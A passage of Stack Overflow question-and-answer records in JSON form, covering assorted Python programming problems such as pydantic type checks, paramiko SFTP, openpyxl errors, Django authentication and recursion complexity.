the normalized value, x is the original value, mean is the mean of the data and standard deviation is the standard deviation of the data.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":3},{"Q_Id":75432923,"CreationDate":"2023-02-13 07:24:28","Q_Score":1,"ViewCount":167,"Question":"I am using aws codebuild to execute my testsuite. It says 'permission denied' when I try to run allure genrate in aws code build.\nPleas share the solution if anyone knows on how to generate allure report while working with aws code build.\nI am using pytest and the scenario is working fine in local. but failes in aws as aws build is not allowing me to run allure generate command.\non successful dev deployment -- > tetssuite execution -- > generate allure repors --> uploade them to s3 --> send the report via email using aws SNS with lambda.\nall above steps are working fine, but the 3rd step.(allure generate).\nPlease share the solution if anyone knows how to do it.","Title":"How to run allure generate command while using aws code build","Tags":"python,amazon-web-services,pytest,allure","AnswerCount":1,"A_Id":75457422,"Answer":"I am able to fix this is by downloading allure package freshly outside of the $CODEBUILD_SRC_DIR and set the path for the same location .\n(Initially I made this part of test repository itself and add that location to PATH, which was not working)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75433141,"CreationDate":"2023-02-13 07:54:12","Q_Score":1,"ViewCount":590,"Question":"I am expecting multiple data types as input to a function & want to take a specific action if its a pydantic model (pydantic model here means class StartReturnModel(BaseModel)).\nIn case of model instance I can check it, using isinstance(model, StartReturnModel) or isinstance(model, BaseModel) to identify its a pydantic model instance.\nBased on the below test program I can see that type(StartReturnModel) returns as ModelMetaclass. Can I use this to identify a pydantic model? or is there any better way to do it?\nfrom pydantic.main import ModelMetaclass\nfrom typing import Optional\n\nclass StartReturnModel(BaseModel):\n result: bool\n pid: Optional[int]\n\nprint(type(StartReturnModel))\nprint(f\"is base model: {bool(isinstance(StartReturnModel, BaseModel))}\")\nprint(f\"is meta model: {bool(isinstance(StartReturnModel, ModelMetaclass))}\")\n\nres = StartReturnModel(result=True, pid=500045)\nprint(f\"\\n{type(res)}\")\nprint(f\"is start model(res): {bool(isinstance(res, StartReturnModel))}\")\nprint(f\"is base model(res): {bool(isinstance(res, BaseModel))}\")\nprint(f\"is meta model(res): {bool(isinstance(res, ModelMetaclass))}\")\n\n*****Output****\n\nis base model: False\nis meta model: True\n\n\nis start model(res): True\nis base model(res): True\nis meta model(res): False","Title":"using isintance on a pydantic model","Tags":"python,pydantic","AnswerCount":2,"A_Id":75433527,"Answer":"Yes you can use it, but why not use isinstance or issubclass.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75433717,"CreationDate":"2023-02-13 08:54:42","Q_Score":3,"ViewCount":5094,"Question":"I am working on google colab with the segmentation_models library. It worked perfectly the first week using it, but now it seems that I can't import the library anymore. Here is the error message, when I execute import segmentation_models as sm :\n---------------------------------------------------------------------------\n\nAttributeError Traceback (most recent call last)\n\n in \n 1 import tensorflow as tf\n----> 2 import segmentation_models as sm\n\n 3 frames\n\n\/usr\/local\/lib\/python3.8\/dist-packages\/efficientnet\/__init__.py in init_keras_custom_objects()\n 69 }\n 70 \n---> 71 keras.utils.generic_utils.get_custom_objects().update(custom_objects)\n 72 \n 73 \n\nAttributeError: module 'keras.utils.generic_utils' has no attribute 'get_custom_objects'\n\nColab uses tensorflow version 2.11.0.\nI did not find any information about this particular error message. Does anyone know where the problem may come from ?","Title":"module 'keras.utils.generic_utils' has no attribute 'get_custom_objects' when importing segmentation_models","Tags":"python,tensorflow,keras,image-segmentation","AnswerCount":3,"A_Id":75434944,"Answer":"Encountered the same issue sometimes. How I solved it:\n\nopen the file keras.py, change all the 'init_keras_custom_objects' to 'init_tfkeras_custom_objects'.\n\nthe location of the keras.py is in the error message. In your case, it should be in \/usr\/local\/lib\/python3.8\/dist-packages\/efficientnet\/","Users Score":4,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75433811,"CreationDate":"2023-02-13 09:03:04","Q_Score":1,"ViewCount":39,"Question":"I have created a Marklogic transform which tries to convert some URL encoded characters: [ ] and whitespace when ingesting data into database. This is the xquery code:\nxquery version \"1.0-ml\";\n\nmodule namespace space = \"http:\/\/marklogic.com\/rest-api\/transform\/space-to-space\";\n\ndeclare function space:transform(\n $context as map:map,\n $params as map:map,\n $content as document-node()\n ) as document-node()\n{\n\n let $puts := (\n xdmp:log($params),\n xdmp:log($context),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%5B+\", \"[\")),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%5D+\", \"]\")),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%20+\", \" \")),\n xdmp:log($context)\n )\n \n return $content\n \n};\n\nWhen I tried this with my python code below\ndef upload_document(self, inputContent, uri, fileType, database, collection):\n if fileType == 'XML':\n headers = {'Content-type': 'application\/xml'}\n fileBytes = str.encode(inputContent)\n elif fileType == 'TXT':\n headers = {'Content-type': 'text\/*'}\n fileBytes = str.encode(inputContent)\n else:\n headers = {'Content-type': 'application\/octet-stream'}\n fileBytes = inputContent\n\n endpoint = ML_DOCUMENTS_ENDPOINT\n params = {}\n\n if uri is not None:\n encodedUri = urllib.parse.quote(uri)\n endpoint = endpoint + \"?uri=\" + encodedUri\n\n if database is not None:\n params['database'] = database\n\n if collection is not None:\n params['collection'] = collection\n\n params['transform'] = 'space-to-space'\n\n req = PreparedRequest()\n req.prepare_url(endpoint, params)\n\n response = requests.put(req.url, data=fileBytes, headers=headers, auth=HTTPDigestAuth(ML_USER_NAME, ML_PASSWORD))\n print('upload_document result: ' + str(response.status_code))\n\n if response.status_code == 400:\n print(response.text)\n\nThe following lines are from the xquery logging:\n\n2023-02-13 16:59:00.067 Info: {}\n\n2023-02-13 16:59:00.067 Info:\n{\"input-type\":\"application\/octet-stream\",\n\"uri\":\"\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG\", \"output-type\":\"application\/octet-stream\"}\n\n2023-02-13 16:59:00.067 Info:\n{\"input-type\":\"application\/octet-stream\",\n\"uri\":\"\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG\", \"output type\":\"application\/octet-stream\"}\n\n2023-02-13 16:59:00.653 Info: Status 500: REST-INVALIDPARAM: (err:FOER0000)\nInvalid parameter: invalid uri:\n\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG","Title":"Unable to create URI with whitespace in MarkLogic","Tags":"python,rest,marklogic","AnswerCount":2,"A_Id":75437482,"Answer":"The MarkLogic REST API is very opinionated about what a valid URI is, and it doesn't allow you to insert documents that have spaces in the URI. If you have an existing URI with a space in it, the REST API will retrieve or update it for you. However, it won't allow you to create a new document with such a URI.\nIf you need to create documents with spaces in the URI, then you will need to use lower-level APIs. xdmp:document-insert() will let you.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75434294,"CreationDate":"2023-02-13 09:51:55","Q_Score":1,"ViewCount":236,"Question":"I want to copy a file from my SFTP server to local computer. However, when I run my code, it didn't show any error while I still cannot find my file on local computer. My code like that:\nimport paramiko\nhost_name ='10.110.100.8'\nuser_name = 'abc'\npassword ='xyz'\nport = 22\nremote_dir_name ='\/data\/...\/PMC1087887_00003.jpg' \nlocal_dir_name = 'D:\\..\\pred.jpg'\n\nt = paramiko.Transport((host_name, port))\nt.connect(username=user_name, password=password)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.get(remote_dir_name,local_dir_name)\n\nI have found the main problem. If I run my code in local in VS Code, it works. But when I login in my server by SSH in VS Code, and run my code on server, I found that my file appeared in current code folder (for example \/home\/...\/D:\\..\\pred.jpg) and its name is D:\\..\\pred.jpg. How to solve this problem if I want to run code on server and download file to local?","Title":"Cannot copy\/move file from remote SFTP server to local machine by Paramiko code running on remote SSH server","Tags":"python,ssh,sftp,paramiko","AnswerCount":1,"A_Id":75456237,"Answer":"If you call SFTPClient.get on the server, it will, as any other file manipulation API, work with files on the server.\nThere's no way to make remote Python script directly work with files on your local machine.\nYou would have to use some API to push the files to your local machine. But for that, your local machine would have to implement the API. For example, you can run an SFTP server on the local machine and \"upload\" the files to it.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75435280,"CreationDate":"2023-02-13 11:30:20","Q_Score":2,"ViewCount":101,"Question":"I want to split this string 'AB4F2D' in ['A', 'B4', 'F2', 'D'].\nEssentially, if character is a letter, return the letter, if character is a number return previous character plus present character (luckily there is no number >9 so there is never a X12).\nI have tried several combinations but I am not able to find the correct one:\ndef get_elements(input_string):\n\n patterns = [\n r'[A-Z][A-Z0-9]',\n r'[A-Z][A-Z0-9]|[A-Z]',\n r'\\D|\\D\\d',\n r'[A-Z]|[A-Z][0-9]',\n r'[A-Z]{1}|[A-Z0-9]{1,2}'\n ]\n\n for p in patterns:\n elements = re.findall(p, input_string)\n print(elements)\n\nresults:\n['AB', 'F2']\n['AB', 'F2', 'D']\n['A', 'B', 'F', 'D']\n['A', 'B', 'F', 'D']\n['A', 'B', '4F', '2D']\n\nCan anyone help? Thanks","Title":"python\/regex: match letter only or letter followed by number","Tags":"python,regex","AnswerCount":2,"A_Id":75435577,"Answer":"\\D\\d?\nOne problem with yours is that you put the shorter alternative first, so the longer one never gets a chance. For example, the correct version of your \\D|\\D\\d is \\D\\d|\\D. But just use \\D\\d?.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75438826,"CreationDate":"2023-02-13 16:45:25","Q_Score":1,"ViewCount":64,"Question":"i have been trying to get speed of the vehicle using MPU-6050 but couldn't find my way to do it so,\nin the end i am stuck here\ndef stateCondition():\nwhile True:\n acc_x = read_raw_data(ACCEL_XOUT_H)\n acc_y = read_raw_data(ACCEL_YOUT_H)\n acc_z = read_raw_data(ACCEL_ZOUT_H)\n gyro_x = read_raw_data(GYRO_XOUT_H)\n gyro_y = read_raw_data(GYRO_YOUT_H)\n gyro_z = read_raw_data(GYRO_ZOUT_H)\n # Full scale range +\/- 250 degree\/C as per sensitivity scale factor\n Ax = acc_x\/16384.0\n Ay = acc_y\/16384.0\n Az = acc_z\/16384.0\n Gx = gyro_x\/131.0\n Gy = gyro_y\/131.0\n Gz = gyro_z\/131.0\n\ncan some one please write the rest of it so that it returns the speed of the vehicle in km\/hr or whatever it is!!!!!\nThank you","Title":"Detect the speed of the vehicle using MPU6050","Tags":"python,raspberry-pi,gyroscope,mpu6050","AnswerCount":1,"A_Id":75472650,"Answer":"An MPU6050 will provide you with information about changes in motion (acceleration or decelleration mostly, but also curves). It will not provide you with absolute values. That can only be achieved by integrating over time, but this requires a known start position\/speed. Also, it is very inexact, particularly with cheap motion sensors such as this one.\nTo get the speed of a vehicle, it is much easier to use a GNSS module instead.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75439849,"CreationDate":"2023-02-13 18:24:22","Q_Score":1,"ViewCount":65,"Question":"Below code probably works (no errors present):\nviews.pl\nclass SignInView(View):\n\n def get(self, request):\n return render(request, \"signin.html\")\n\n def post(self, request):\n user = request.POST.get('username', '')\n pass = request.POST.get('password', '')\n\n user = authenticate(username=user, password=pass)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('\/')\n else:\n return HttpResponse(\"Bad user.\")\n else:\n return HttpResponseRedirect('\/')\n\n....but in template:\n{% user.is_authenticated %}\n\nis not True. So I don't see any functionality for authenticated user.\nWhat is the problem?","Title":"Django - after sign-in template don't know that user is authenticated","Tags":"python,django,django-views,django-templates,django-authentication","AnswerCount":2,"A_Id":75439899,"Answer":"You should do like {% if request.user.is_authenticated %} or {% if user.is_authenticated %}","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75440354,"CreationDate":"2023-02-13 19:20:26","Q_Score":12,"ViewCount":6906,"Question":"This bug suddenly came up literally today after read_excel previously was working fine. Fails no matter which version of python3 I use - either 10 or 11.\nDo folks know the fix?\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 38, in \n main()\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 25, in main\n sb = diana.superbills.load_superbills_births(args.site, ath)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/diana\/superbills.py\", line 148, in load_superbills_births\n sb = pd.read_excel(SUPERBILLS_EXCEL, sheet_name=\"Births\", parse_dates=[\"DOS\", \"DOB\"])\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 211, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 331, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 482, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 1695, in __init__\n self._reader = self._engines[engine](self._io, storage_options=storage_options)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 557, in __init__\n super().__init__(filepath_or_buffer, storage_options=storage_options)\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 545, in __init__\n self.book = self.load_workbook(self.handles.handle)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 568, in load_workbook\n return load_workbook(\n ^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 346, in load_workbook\n reader.read()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 303, in read\n self.parser.assign_names()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/workbook.py\", line 109, in assign_names\n sheet.defined_names[name] = defn\n ^^^^^^^^^^^^^^^^^^^\nAttributeError: 'ReadOnlyWorksheet' object has no attribute 'defined_names'","Title":"Why does pandas read_excel fail on an openpyxl error saying 'ReadOnlyWorksheet' object has no attribute 'defined_names'?","Tags":"python,pandas,openpyxl","AnswerCount":3,"A_Id":75527773,"Answer":"By installing the 'xlxswriter', the trouble was solved. Thanks to the above solutions, but they do not work in my case. So, this maybe another issuse you may consider.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75440354,"CreationDate":"2023-02-13 19:20:26","Q_Score":12,"ViewCount":6906,"Question":"This bug suddenly came up literally today after read_excel previously was working fine. Fails no matter which version of python3 I use - either 10 or 11.\nDo folks know the fix?\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 38, in \n main()\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 25, in main\n sb = diana.superbills.load_superbills_births(args.site, ath)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/diana\/superbills.py\", line 148, in load_superbills_births\n sb = pd.read_excel(SUPERBILLS_EXCEL, sheet_name=\"Births\", parse_dates=[\"DOS\", \"DOB\"])\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 211, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 331, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 482, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 1695, in __init__\n self._reader = self._engines[engine](self._io, storage_options=storage_options)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 557, in __init__\n super().__init__(filepath_or_buffer, storage_options=storage_options)\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 545, in __init__\n self.book = self.load_workbook(self.handles.handle)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 568, in load_workbook\n return load_workbook(\n ^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 346, in load_workbook\n reader.read()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 303, in read\n self.parser.assign_names()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/workbook.py\", line 109, in assign_names\n sheet.defined_names[name] = defn\n ^^^^^^^^^^^^^^^^^^^\nAttributeError: 'ReadOnlyWorksheet' object has no attribute 'defined_names'","Title":"Why does pandas read_excel fail on an openpyxl error saying 'ReadOnlyWorksheet' object has no attribute 'defined_names'?","Tags":"python,pandas,openpyxl","AnswerCount":3,"A_Id":75449213,"Answer":"You can first try to uninstall the openpyxl\npip uninstall openpyxl -y\nand then use\npip install openpyxl==3.1.0 -y\nNote: Use ! infront of code if case of using notebooks.\n!pip uninstall openpyxl -y\n!pip install openpyxl==3.1.0 -y\nIf the above code does not work. You can try to upgrade the pandas. i.e\n!pip uninstall pandas -y && !pip install pandas","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":2},{"Q_Id":75440385,"CreationDate":"2023-02-13 19:24:07","Q_Score":1,"ViewCount":122,"Question":"I am trying to load data into a custom NER model using spacy, I am getting an error:-\n'RobertaTokenizerFast' object has no attribute '_in_target_context_manager'\nhowever, it works fine with the other models.\nThank you for your time!!","Title":"'RobertaTokenizerFast' object has no attribute '_in_target_context_manager' error while loading data into custom NER model","Tags":"python,spacy,named-entity-recognition","AnswerCount":1,"A_Id":75515376,"Answer":"I faced the same issue after upgrading my environment from {Python 3.9 + Spacy 3.3} to {Python 3.10 + Space 3.5}. Resolved this by upgrading and re-packaging the model.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75444318,"CreationDate":"2023-02-14 06:50:01","Q_Score":1,"ViewCount":138,"Question":"i wrote a basic python program and tried running it using the play button but nothing happens,\ni look through the interpreters and the one for python isnt detected\ncan someone guide me\ntried looking online for answers but most are confusing since i can't seem to find some of the settings they are recommending i use","Title":"Python file won't run in vs code using play button","Tags":"python-3.x,visual-studio-code","AnswerCount":1,"A_Id":75444459,"Answer":"Hey, my suggestion would be :\n\nFirst check the installation of python on your machine, and if it\ndoesn't help then,\nOpen keyboard shortcuts in VS Code 'CTRL + K and CTRL + S' or by\nclicking settings button in bottom-left corner.\nSearch \"Run Python File in Terminal\".\nYou will get first option with the same title.\nDouble click the Key Binding area in front of title.\nAnd set a keyboard shortcut for running Python {eg: 'ALT + Q' (My shortcut)}. This would be much\nconvenient.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75444637,"CreationDate":"2023-02-14 07:32:30","Q_Score":2,"ViewCount":73,"Question":"I have a pandas data frame that looks like this:\n# df1\n Id A B C\n 3 4 5 6\n\nI wrote this to a csv and it works great the first time,\nhowever when I append the CSV it rewrites the columns and the values again\nlike this:\n Id A B C\n 3 4 5 6\n Id A B C\n 3 4 5 6\n\nIs there a method for the 2nd iteration afterwards to only write the value and not the columns when writing to a csv through pandas?\nI have tried using the 'a' command for appending and to empty my dataframe so it's just the columns to use as a header to write to the csv and then the as a separate dataframe append the values however pandas does not allow for empty dataframes","Title":"How to write to a CSV file with pandas while appending to the next empty row without writing the columns again?","Tags":"python,pandas,csv","AnswerCount":2,"A_Id":75444673,"Answer":"Set header=False option for each next df.to_csv call to exclude column names from record.","Users Score":2,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75447782,"CreationDate":"2023-02-14 12:23:38","Q_Score":1,"ViewCount":152,"Question":"I have a problem (that I think I'm over complicating) but for the life of me I can't seem to solve it.\nI have 2 dataframes. One containing a list of items with quantities that I want to buy. I have another dataframe with a list of suppliers, unit cost and quantity of items available. Along with this I have a dataframe with shipping cost for each supplier.\nI want to find the optimal way to break up my order among the suppliers to minimise costs.\nSome added points:\n\nSuppliers won't always be able to fulfil the full order of an item so I want to also be able to split an individual item among suppliers if it is cheaper\nShipping only gets added once per supplier (2 items from a supplier means I still only pay shipping once for that supplier)\n\nI have seen people mention cvxpy for a similar problem but I'm struggling to find a way to use it for my problem (never used it before).\nSome advice would be great.\nNote: You don't have to write all the code for me but giving a bit of guidance on how to break down the problem would be great.\nTIA","Title":"How would I go about finding the optimal way to split up an order","Tags":"python,optimization,cvxpy,operations-research","AnswerCount":2,"A_Id":75453931,"Answer":"Some advice too large for a comment:\nAs @Erwin Kalvelagen alludes to, this problem can be described as a math program, which is probably the most common-sense approach.\nThe generalized plan of attack is to figure out how to create an expression of the problem using some modeling package and then turn that problem over to a solver engine which uses diverse techniques to find the optimal answer.\ncvxpy is certainly 1 of the options to do the first part with. I'm partial to pyomo, and pulp is also viable. pulp also installs with a solver (cbc) which is suitable for this type of problem. In other cases, you may need to install separately.\nIf you take this approach, look through a text or some online examples on how to formulate a MIP (mixed integer program). You'll have some sets (perhaps items, suppliers, etc.), data that form constraints or limits, some variables indexed by the sets, and an objective....likely to minimize cost.\nForget about the complexities of split-orders and combined shipping at first and just see if you can get something working with toy data, then build out from there.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75447819,"CreationDate":"2023-02-14 12:27:00","Q_Score":1,"ViewCount":65,"Question":"I develop an app for creating products in online shop. Let's suppose I have 50 categories of products and each of these has some required parameters for product (like color, size, etc.).\nSome parameters apper in all categories, and some are unique. That gives me around 300 parameters (fields) that should be defined in Django model.\nI suppose it is not good idea to create one big database with 300 fields and add products that have 1-15 parameters there (leaving remaining fields empty). What would be the best way to handle it?\nWhat would be the best way to display form that will ask only for parameters required in given category?","Title":"How to handle 300 parameters in Django Model \/ Form?","Tags":"python,django,e-commerce","AnswerCount":2,"A_Id":75447889,"Answer":"If you have to keep the Model structure as you have defined it here, I would create a \"Product\" \"Category\" \"ProductCategory\" tables.\nProduct table is as follows:\n\n\n\n\nProductID\nProductName\n\n\n\n\n1\nShirt\n\n\n2\nTable\n\n\n3\nVase\n\n\n\n\nCategory table is following\n\n\n\n\nCategoryID\nCategoryName\n\n\n\n\n1\nSize\n\n\n2\nColor\n\n\n3\nMaterial\n\n\n\n\nProductCategory\n\n\n\n\nID\nProductID\nCategoryID\nCategoryValue\n\n\n\n\n1\n1 (Shirt)\n1 (Size)\nMedium\n\n\n2\n2 (Table)\n2 (Color)\nDark Oak\n\n\n3\n3 (Vase)\n3 (Material)\nGlass\n\n\n3\n3 (Vase)\n3 (Material)\nPlastic\n\n\n\n\nThis would be the easiest way, which wouldn't create 300 columns, would allow you to reuse categories across different types of products, but in the case of many products, would start to slowdown the database queries, as you would be joining 2 big tables. Product and ProductCategory\nYou could split it up in more major Categories such as \"Plants\", \"Kitchenware\" etc etc.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449860,"Answer":"Background\nA unary encoding of the input uses an alphabet of size 1: think tally marks. If the input is the number a, you need O(a) bits.\nA binary encoding uses an alphabet of size 2: you get 0s and 1s. If the number is a, you need O(log_2 a) bits.\nA trinary encoding uses an alphabet of size 3: you get 0s, 1s, and 2s. If the number is a, you need O(log_3 a) bits.\nIn general, a k-ary encoding uses an alphabet of size k: you get 0s, 1s, 2s, ..., and k-1s. If the number is a, you need O(log_k a) bits.\nWhat does this have to do with complexity?\nAs you are aware, we ignore multiplicative constants inside big-oh notation. n, 2n, 3n, etc, are all O(n).\nThe same holds for logarithms. log_2 n, 2 log_2 n, 3 log_2 n, etc, are all O(log_2 n).\nThe key observation here is that the ratio log_k1 n \/ log_k2 n is a constant, no matter what k1 and k2 are... as long as they are greater than 1. That means f(log_k1 n) = O(log_k2 n) for all k1, k2 > 1.\nThis is important when comparing algorithms. As long as you use an \"efficient\" encoding (i.e., not a unary encoding), it doesn't matter what base you use: you can simply say f(n) = O(lg n) without specifying the base. This allows us to compare runtime of algorithms without worrying about the exact encoding you use.\nSo n = b (which implies a unary encoding) is typically never used. Binary encoding is simplest, and doesn't provide a non-constant speed-up over any other encoding, so we usually just assume binary encoding.\nThat means we almost always assume that n = lg a + lg b as the input size, not n = a + b. A unary encoding is the only one that suggests linear growth, rather than exponential growth, as the values of a and b increase.\n\nOne area, though, where unary encodings are used is in distinguishing between strong NP-completeness and weak NP-completeness. Without getting into the theory, if a problem is NP-complete, we don't expect any algorithm to have a polynomial running time, that is, one bounded by O(n**k) for some constant k when using an efficient encoring.\nBut some algorithms do become polynomial if we allow a unary encoding. If a problem that is otherwise NP-complete becomes polynomial when using an unary encoding, we call that a weakly NP-complete problem. It's still slow, but it is in some sense \"faster\" than an algorithm where the size of the numbers doesn't matter.","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":3},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449172,"Answer":"Your friend and you can both be right, depending on what is n. Another way to say this is that your friend and you are both wrong, since you both forgot to specify what was n.\nYour function takes an input that consists in two variables, a and b. These variables are numbers. If we express the complexity as a function of these numbers, it is really O(b log(ab)), because it consists in b iterations, and each iteration requires an addition of numbers of size up to ab, which takes log(ab) operations.\nNow, you both chose to express the complexity in function of n rather than a or b. This is okay; we often do this; but an important question is: what is n?\nSometimes we think it's \"obvious\" what is n, so we forget to say it.\n\nIf you choose n = max(a, b) or n = a + b, then you are right, the complexity is O(n).\nIf you choose n to be the length of the input, then n is the number of bits needed to represent the two numbers a and b. In other words, n = log(a) + log(b). In that case, your friend is right, the complexity is O(2^n).\n\nSince there is an ambiguity in the meaning of n, I would argue that it's meaningless to express the complexity as a function of n without specifying what n is. So, your friend and you are both wrong.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case 